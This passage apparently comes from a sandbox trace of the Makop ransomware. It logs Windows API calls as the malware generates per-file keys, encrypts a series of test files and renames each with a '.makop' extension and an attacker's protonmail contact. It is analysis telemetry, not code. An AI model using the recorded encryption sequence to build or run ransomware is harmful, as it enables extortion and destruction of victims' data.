lpNumberOfBytesWritten=0x245f780*=0x13710, lpOverlapped=0x0) returned 1 [0127.806] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.806] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x137e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.806] SetEndOfFile (hFile=0x114) returned 1 [0127.809] GetProcessHeap () returned 0x550000 [0127.809] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0127.809] GetProcessHeap () returned 0x550000 [0127.810] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.810] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\wzcS4BMO.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\wzcs4bmo.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\wzcS4BMO.avi.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\wzcs4bmo.avi.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.810] CloseHandle (hObject=0x114) returned 1 [0127.810] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d96310, ftCreationTime.dwHighDateTime=0x1d5e721, ftLastAccessTime.dwLowDateTime=0x15ee71a0, ftLastAccessTime.dwHighDateTime=0x1d5d9d4, ftLastWriteTime.dwLowDateTime=0x15ee71a0, ftLastWriteTime.dwHighDateTime=0x1d5d9d4, nFileSizeHigh=0x0, nFileSizeLow=0x16f40, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="ypYG.bmp", cAlternateFileName="")) returned 1 [0127.811] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\ypYG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\ypyg.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0127.811] GetProcessHeap () returned 0x550000 [0127.811] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.811] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.811] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a0 | out: lpNewFilePointer=0x0) returned 1 [0127.811] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.811] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.811] GetProcessHeap () returned 0x550000 [0127.811] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x30) returned 0x56cb70 [0127.811] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56cb70*, pdwDataLen=0x245f768*=0x30, dwBufLen=0x30 | out: pbData=0x56cb70*, pdwDataLen=0x245f768*=0x30) returned 1 [0127.811] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.811] WriteFile (in: hFile=0x114, lpBuffer=0x56cb70*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x56cb70*, lpNumberOfBytesWritten=0x245f780*=0x30, lpOverlapped=0x0) returned 1 [0127.812] WriteFile (in: hFile=0x114, lpBuffer=0x245f788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f788*, lpNumberOfBytesWritten=0x245f780*=0x4, lpOverlapped=0x0) returned 1 [0127.812] WriteFile (in: hFile=0x114, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245f780*=0x10, lpOverlapped=0x0) returned 1 [0127.812] WriteFile (in: hFile=0x114, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245f780*=0x80, lpOverlapped=0x0) returned 1 [0127.813] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a8 | out: lpNewFilePointer=0x0) returned 1 [0127.813] WriteFile (in: hFile=0x114, lpBuffer=0x245f798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f798*, lpNumberOfBytesWritten=0x245f780*=0x8, lpOverlapped=0x0) returned 1 [0127.813] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.813] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.813] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.813] ReadFile (in: hFile=0x114, lpBuffer=0x2250020, nNumberOfBytesToRead=0x16f40, lpNumberOfBytesRead=0x245f78c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245f78c*=0x16f40, lpOverlapped=0x0) returned 1 [0127.814] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f768*=0x16f40, dwBufLen=0x16f40 | out: pbData=0x2250020*, pdwDataLen=0x245f768*=0x16f40) returned 1 [0127.815] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.815] WriteFile (in: hFile=0x114, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x16f40, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245f780*=0x16f40, lpOverlapped=0x0) returned 1 [0127.816] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.816] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x17004, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.816] SetEndOfFile (hFile=0x114) returned 1 [0127.819] GetProcessHeap () returned 0x550000 [0127.819] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0127.819] GetProcessHeap () returned 0x550000 [0127.819] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.820] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\ypYG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\ypyg.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\ypYG.bmp.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\ypyg.bmp.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.826] CloseHandle (hObject=0x114) returned 1 [0127.828] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aadb200, ftCreationTime.dwHighDateTime=0x1d5de68, ftLastAccessTime.dwLowDateTime=0xe46729d0, ftLastAccessTime.dwHighDateTime=0x1d5dbd9, ftLastWriteTime.dwLowDateTime=0xe46729d0, ftLastWriteTime.dwHighDateTime=0x1d5dbd9, nFileSizeHigh=0x0, nFileSizeLow=0xcb60, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="YSl8Fs-d5tS-xYF.docx", cAlternateFileName="YSL8FS~1.DOC")) returned 1 [0127.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\YSl8Fs-d5tS-xYF.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\ysl8fs-d5ts-xyf.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0127.828] GetProcessHeap () returned 0x550000 [0127.828] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.828] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.828] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a0 | out: lpNewFilePointer=0x0) returned 1 [0127.828] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.828] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.828] GetProcessHeap () returned 0x550000 [0127.828] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0127.828] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245f768*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245f768*=0x50) returned 1 [0127.828] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.828] WriteFile (in: hFile=0x114, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245f780*=0x50, lpOverlapped=0x0) returned 1 [0127.830] WriteFile (in: hFile=0x114, lpBuffer=0x245f788*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f788*, lpNumberOfBytesWritten=0x245f780*=0x4, lpOverlapped=0x0) returned 1 [0127.830] WriteFile (in: hFile=0x114, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245f780*=0x10, lpOverlapped=0x0) returned 1 [0127.830] WriteFile (in: hFile=0x114, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245f780*=0x80, lpOverlapped=0x0) returned 1 [0127.830] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245f7a8 | out: lpNewFilePointer=0x0) returned 1 [0127.830] WriteFile (in: hFile=0x114, lpBuffer=0x245f798*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x245f798*, lpNumberOfBytesWritten=0x245f780*=0x8, lpOverlapped=0x0) returned 1 [0127.830] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245f784 | out: phKey=0x245f784*=0x56d208) returned 1 [0127.830] CryptSetKeyParam (hKey=0x56d208, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.830] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.830] ReadFile (in: hFile=0x114, lpBuffer=0x2250020, nNumberOfBytesToRead=0xcb60, lpNumberOfBytesRead=0x245f78c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245f78c*=0xcb60, lpOverlapped=0x0) returned 1 [0127.831] CryptEncrypt (in: hKey=0x56d208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f768*=0xcb60, dwBufLen=0xcb60 | out: pbData=0x2250020*, pdwDataLen=0x245f768*=0xcb60) returned 1 [0127.831] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.831] WriteFile (in: hFile=0x114, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0xcb60, lpNumberOfBytesWritten=0x245f780, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245f780*=0xcb60, lpOverlapped=0x0) returned 1 [0127.832] CryptDestroyKey (hKey=0x56d208) returned 1 [0127.832] SetFilePointerEx (in: hFile=0x114, liDistanceToMove=0xcc44, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.832] SetEndOfFile (hFile=0x114) returned 1 [0127.835] GetProcessHeap () returned 0x550000 [0127.835] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0127.835] GetProcessHeap () returned 0x550000 [0127.835] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.835] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\YSl8Fs-d5tS-xYF.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\ysl8fs-d5ts-xyf.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\V-KeJ0wma0\\YSl8Fs-d5tS-xYF.docx.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\v-kej0wma0\\ysl8fs-d5ts-xyf.docx.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.849] CloseHandle (hObject=0x114) returned 1 [0127.850] FindNextFileW (in: hFindFile=0x56c9b0, lpFindFileData=0x245f810 | out: lpFindFileData=0x245f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aadb200, ftCreationTime.dwHighDateTime=0x1d5de68, ftLastAccessTime.dwLowDateTime=0xe46729d0, ftLastAccessTime.dwHighDateTime=0x1d5dbd9, ftLastWriteTime.dwLowDateTime=0xe46729d0, ftLastWriteTime.dwHighDateTime=0x1d5dbd9, nFileSizeHigh=0x0, nFileSizeLow=0xcb60, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="YSl8Fs-d5tS-xYF.docx", cAlternateFileName="YSL8FS~1.DOC")) returned 0 [0127.850] FindClose (in: hFindFile=0x56c9b0 | out: hFindFile=0x56c9b0) returned 1 [0127.850] GetProcessHeap () returned 0x550000 [0127.850] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x593010 | out: hHeap=0x550000) returned 1 [0127.850] FindNextFileW (in: hFindFile=0x56c880, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129008d0, ftCreationTime.dwHighDateTime=0x1d5e081, ftLastAccessTime.dwLowDateTime=0xc952ad40, ftLastAccessTime.dwHighDateTime=0x1d5dddc, ftLastWriteTime.dwLowDateTime=0xc952ad40, ftLastWriteTime.dwHighDateTime=0x1d5dddc, nFileSizeHigh=0x0, nFileSizeLow=0x94fa, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="Vx76d.swf", cAlternateFileName="")) returned 1 [0127.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\Vx76d.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\vx76d.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0127.850] GetProcessHeap () returned 0x550000 [0127.850] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.850] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.850] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fa28 | out: lpNewFilePointer=0x0) returned 1 [0127.850] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa38*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa38*, lpNumberOfBytesWritten=0x245fa08*=0x6, lpOverlapped=0x0) returned 1 [0127.852] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fa0c | out: phKey=0x245fa0c*=0x56c9b0) returned 1 [0127.852] CryptSetKeyParam (hKey=0x56c9b0, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.852] GetProcessHeap () returned 0x550000 [0127.852] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x30) returned 0x56cb70 [0127.852] CryptEncrypt (in: hKey=0x56c9b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56cb70*, pdwDataLen=0x245f9f0*=0x30, dwBufLen=0x30 | out: pbData=0x56cb70*, pdwDataLen=0x245f9f0*=0x30) returned 1 [0127.852] CryptDestroyKey (hKey=0x56c9b0) returned 1 [0127.852] WriteFile (in: hFile=0xa4, lpBuffer=0x56cb70*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x56cb70*, lpNumberOfBytesWritten=0x245fa08*=0x30, lpOverlapped=0x0) returned 1 [0127.852] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa10*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa10*, lpNumberOfBytesWritten=0x245fa08*=0x4, lpOverlapped=0x0) returned 1 [0127.852] WriteFile (in: hFile=0xa4, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fa08*=0x10, lpOverlapped=0x0) returned 1 [0127.852] WriteFile (in: hFile=0xa4, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fa08*=0x80, lpOverlapped=0x0) returned 1 [0127.852] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fa30 | out: lpNewFilePointer=0x0) returned 1 [0127.853] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa20*, lpNumberOfBytesWritten=0x245fa08*=0x8, lpOverlapped=0x0) returned 1 [0127.853] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fa0c | out: phKey=0x245fa0c*=0x56c9b0) returned 1 [0127.853] CryptSetKeyParam (hKey=0x56c9b0, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.853] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.853] ReadFile (in: hFile=0xa4, lpBuffer=0x2250020, nNumberOfBytesToRead=0x94fa, lpNumberOfBytesRead=0x245fa14, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fa14*=0x94fa, lpOverlapped=0x0) returned 1 [0127.853] CryptEncrypt (in: hKey=0x56c9b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f9f0*=0x9500, dwBufLen=0x9500 | out: pbData=0x2250020*, pdwDataLen=0x245f9f0*=0x9500) returned 1 [0127.854] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.854] WriteFile (in: hFile=0xa4, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x9500, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fa08*=0x9500, lpOverlapped=0x0) returned 1 [0127.854] CryptDestroyKey (hKey=0x56c9b0) returned 1 [0127.854] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x95c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.854] SetEndOfFile (hFile=0xa4) returned 1 [0127.858] GetProcessHeap () returned 0x550000 [0127.858] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56cb70 | out: hHeap=0x550000) returned 1 [0127.858] GetProcessHeap () returned 0x550000 [0127.858] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0127.858] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\Vx76d.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\vx76d.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\Vx76d.swf.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\vx76d.swf.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0127.859] CloseHandle (hObject=0xa4) returned 1 [0127.859] FindNextFileW (in: hFindFile=0x56c880, lpFindFileData=0x245fa98 | out: lpFindFileData=0x245fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84396190, ftCreationTime.dwHighDateTime=0x1d5d9c7, ftLastAccessTime.dwLowDateTime=0x8ce3abb0, ftLastAccessTime.dwHighDateTime=0x1d5e2b0, ftLastWriteTime.dwLowDateTime=0x8ce3abb0, ftLastWriteTime.dwHighDateTime=0x1d5e2b0, nFileSizeHigh=0x0, nFileSizeLow=0x14d94, dwReserved0=0x550138, dwReserved1=0x77c7387a, cFileName="WnZ24EI.gif", cAlternateFileName="")) returned 1 [0127.859] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HLRDqhTz34MvUQb\\WnZ24EI.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hlrdqhtz34mvuqb\\wnz24ei.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0127.859] GetProcessHeap () returned 0x550000 [0127.859] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0127.859] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0127.859] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fa28 | out: lpNewFilePointer=0x0) returned 1 [0127.859] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa38*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa38*, lpNumberOfBytesWritten=0x245fa08*=0xc, lpOverlapped=0x0) returned 1 [0127.860] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fa0c | out: phKey=0x245fa0c*=0x56c9b0) returned 1 [0127.860] CryptSetKeyParam (hKey=0x56c9b0, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.860] GetProcessHeap () returned 0x550000 [0127.860] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0127.860] CryptEncrypt (in: hKey=0x56c9b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245f9f0*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245f9f0*=0x40) returned 1 [0127.860] CryptDestroyKey (hKey=0x56c9b0) returned 1 [0127.860] WriteFile (in: hFile=0xa4, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fa08*=0x40, lpOverlapped=0x0) returned 1 [0127.861] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa10*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa10*, lpNumberOfBytesWritten=0x245fa08*=0x4, lpOverlapped=0x0) returned 1 [0127.861] WriteFile (in: hFile=0xa4, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fa08*=0x10, lpOverlapped=0x0) returned 1 [0127.861] WriteFile (in: hFile=0xa4, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fa08*=0x80, lpOverlapped=0x0) returned 1 [0127.861] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fa30 | out: lpNewFilePointer=0x0) returned 1 [0127.861] WriteFile (in: hFile=0xa4, lpBuffer=0x245fa20*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x245fa20*, lpNumberOfBytesWritten=0x245fa08*=0x8, lpOverlapped=0x0) returned 1 [0127.861] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fa0c | out: phKey=0x245fa0c*=0x56c9b0) returned 1 [0127.861] CryptSetKeyParam (hKey=0x56c9b0, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0127.861] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.861] ReadFile (in: hFile=0xa4, lpBuffer=0x2250020, nNumberOfBytesToRead=0x14d94, lpNumberOfBytesRead=0x245fa14, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fa14*=0x14d94, lpOverlapped=0x0) returned 1 [0127.862] CryptEncrypt (in: hKey=0x56c9b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245f9f0*=0x14da0, dwBufLen=0x14da0 | out: pbData=0x2250020*, pdwDataLen=0x245f9f0*=0x14da0) returned 1 [0127.863] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.863] WriteFile (in: hFile=0xa4, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x14da0, lpNumberOfBytesWritten=0x245fa08, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fa08*=0x14da0, lpOverlapped=0x0) 